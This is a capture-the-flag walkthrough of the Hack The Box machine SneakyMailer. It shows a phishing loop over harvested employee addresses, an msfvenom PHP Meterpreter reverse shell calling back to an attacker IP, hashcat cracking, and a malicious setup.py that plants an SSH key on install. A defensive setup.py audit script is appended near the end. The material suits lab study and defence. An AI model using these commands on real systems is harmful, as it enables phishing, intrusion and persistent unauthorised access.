8. Hack The Box. Level Medium: SneakyMailer Walkthrough. Phishing, LPE via PyPI and GTFOBins pip3

11 December 2024 5 minutes Author: Lady Liberty

This article provides a detailed walkthrough of the SneakyMailer challenge on Hack The Box. You will learn how to obtain a list of email addresses, send a phishing email, deploy a PHP shell via FTP, execute arbitrary code using PyPI, and escalate privileges via GTFOBins pip3.

SneakyMailer walkthrough guide

The article demonstrates the process of obtaining a list of email addresses, executing a phishing email campaign, deploying a PHP shell via FTP, executing arbitrary code using PyPI, and escalating privileges via GTFOBins pip3.

Recon

This machine has an IP address of 10.10.10.197, which I add to /etc/hosts.

10.10.10.197    sneakymailer.htb

First, a scan for open ports is performed.

#!/bin/bash
# Full TCP port sweep first, then a detailed (-A) scan of only the ports found open
ports=$(nmap -p- --min-rate=500 "$1" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p"$ports" -A "$1"

The scan revealed a large number of open ports: several belong to mail services, ports 80 and 8080 to the web server, and FTP and SSH are also active but require credentials. As the scan output shows, the web server redirects to another domain, so we add that domain to /etc/hosts as well.

10.10.10.197    sneakycorp.htb

On the website you can find a list of employees and their corresponding emails.

To collect all the email addresses we use an email extractor.

Now we listen on port 80 and send the phishing email to every address on the list using the swaks tool.

while read mail; do swaks --to $mail --from [email protected] --header 'Subject: News' --body 'Look it: http://10.10.14.114/' --server sneakymailer.htb | grep 'To:' ; done < emails.txt

And we see that some user clicks on our link.

Let’s decode the data.

We get a password with which we can log in to the mail server.

Entry point

We use Evolution as a client.

We enter the password when connecting and see two emails.

One of the emails revealed the password for a developer account (suitable for FTP access) and a mention of PyPI associated with the user low.

After logging into FTP and receiving some files, we notice that these are the source codes of the site.

Let’s add the dev subdomain to /etc/hosts.

10.10.10.197    dev.sneakycorp.htb

The data obtained allows us to place a PHP shell on the server. For this, we use a payload. In this case, Meterpreter was chosen as the payload.

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.114 LPORT=4321 -f raw > r.php
# msfvenom's raw PHP output has no opening tag, so prepend '<?php ' to the file
cat r.php | xclip -selection clipboard && echo '<?php ' | tr -d '\n' > r.php && xclip -selection clipboard -o >> r.php

After placing the file in the dev directory, let’s start the listener.

handler -p php/meterpreter_reverse_tcp -H 10.10.14.114 -P 4321

After accessing our file, we get an active session.

USER

After inspecting the web server environment, we discover the pypi subdomain, which was already mentioned in the context of this lab, and find the .htpasswd file. We check which hashcat mode handles $apr1$ hashes and crack the hash with rockyou.

hashcat --example | grep '$apr1' -A2 -B2

hashcat -m 1600 -a 0 pypi.hash ./tools/rockyou.txt

We will also add the found subdomain to /etc/hosts.

10.10.10.197    pypi.sneakycorp.htb

Installing your own package allows you to execute arbitrary code. Here is a good tutorial on creating a python package. First, let’s create a directory.

Now you need to create the following files: __init__.py, .pypirc, README.md, setup.cfg, and setup.py. The setup.py file will contain the code to be executed. Example setup.py that appends our SSH public key to the authorized_keys of the user low:

from setuptools import setup

# Append our public key for user low. If the write fails (for example when the
# sdist is built by a user that cannot access /home/low), fall through to
# setup() so the package still builds.
try:
    f = open('/home/low/.ssh/authorized_keys', 'a')
    f.write('ssh-rsa ... ')
    f.close()
except:
    setup(
        name='ralfpack',
        packages=['ralfpack'],
        description='R',
        version='0.1',
        url='http://pypi.sneakymailer.htb:8080/ralfpack',
        author='ralf',
        author_email='[email protected]',
        keywords=['pip', 'ralfpack', 'example'],
    )

We create __init__.py (so that it exists), an empty README.md and setup.cfg (we specify README.md in it).

And all that’s left is to create a .pypirc file. We specify the package name and configuration for it.

We upload all files to the host.

Let’s get a normal shell and assemble our package.

python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 setup.py sdist

Now let’s upload it to the PyPI server.

python3 setup.py sdist upload -r ralfpack

The key has been successfully uploaded, and you can now connect to SSH using the private key to access the low user account.
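The defender-side counterpart to the setup.py trick above, as an added example that is not part of the original walkthrough: a small audit script that parses a setup.py with Python's ast module before installation and flags open() calls with write or append modes, shell/exec-style calls, and a setup() call hidden in a try/except, which is exactly the pattern used here. The sample setup.py is constructed for the example and the key in it is a placeholder.

```python
import ast

# Callees that have no business in a setup.py that only describes a package.
SUSPICIOUS_CALLS = {"exec", "eval", "compile", "__import__", "os.system", "os.popen",
                    "subprocess.run", "subprocess.Popen", "subprocess.call",
                    "subprocess.check_output", "socket.socket", "urllib.request.urlopen"}

# Constructed sample mirroring the try/except trick in this box (key is a placeholder).
SAMPLE_SETUP_PY = """
from setuptools import setup
try:
    f = open('/home/low/.ssh/authorized_keys', 'a')
    f.write('ssh-rsa PLACEHOLDER_KEY')
    f.close()
except Exception:
    setup(name='ralfpack', packages=['ralfpack'], version='0.1')
"""

def _callee(node):
    # Dotted name of the called object, e.g. 'os.system', 'f.write' or 'open'.
    parts, f = [], node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts))

def _open_mode(node):
    # Positional or keyword mode argument of open(); None if absent or dynamic.
    args = node.args[1:2] + [k.value for k in node.keywords if k.arg == "mode"]
    return args[0].value if args and isinstance(args[0], ast.Constant) else None

def audit_setup_py(source):
    # Return human-readable findings for one setup.py source text.
    tree, findings = ast.parse(source), []
    for node in (n for n in ast.walk(tree) if isinstance(n, ast.Call)):
        name = _callee(node)
        mode = _open_mode(node) if name == "open" else None
        if isinstance(mode, str) and any(c in mode for c in "wax+"):
            findings.append(f"line {node.lineno}: open() with write mode {mode!r}")
        elif name in SUSPICIOUS_CALLS:
            findings.append(f"line {node.lineno}: call to {name}()")
    # setup() reached only on an exception path behaves differently per host.
    for try_node in (n for n in ast.walk(tree) if isinstance(n, ast.Try)):
        for sub in ast.walk(try_node):
            if isinstance(sub, ast.Call) and _callee(sub) == "setup":
                findings.append(f"line {sub.lineno}: setup() inside try/except block")
                break
    return findings
```

Run it against every sdist's setup.py before a cron job or a mirror installs it; a package whose metadata call sits behind a bare except, or that opens files for writing at install time, deserves a manual look.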

ROOT

Analysis of sudo settings revealed that the pip3 command can be executed with root privileges. This opens up the possibility of privilege escalation through the exploitation of pip3 functionality.

We turn to GTFOBins and see instructions for obtaining a shell.

We repeat and get a shell on behalf of root.

Conclusion

This article describes the completion of the SneakyMailer task on Hack The Box using modern cybersecurity techniques. We demonstrate how, through network port analysis, phishing mailing, PHP shell deployment, and working with PyPI, you can gain access to accounts and elevate privileges. The final stage is to use the sudo capabilities to run pip3 with administrator rights, which opens the way to full control over the system. The article is useful for understanding the practical aspects of information security.
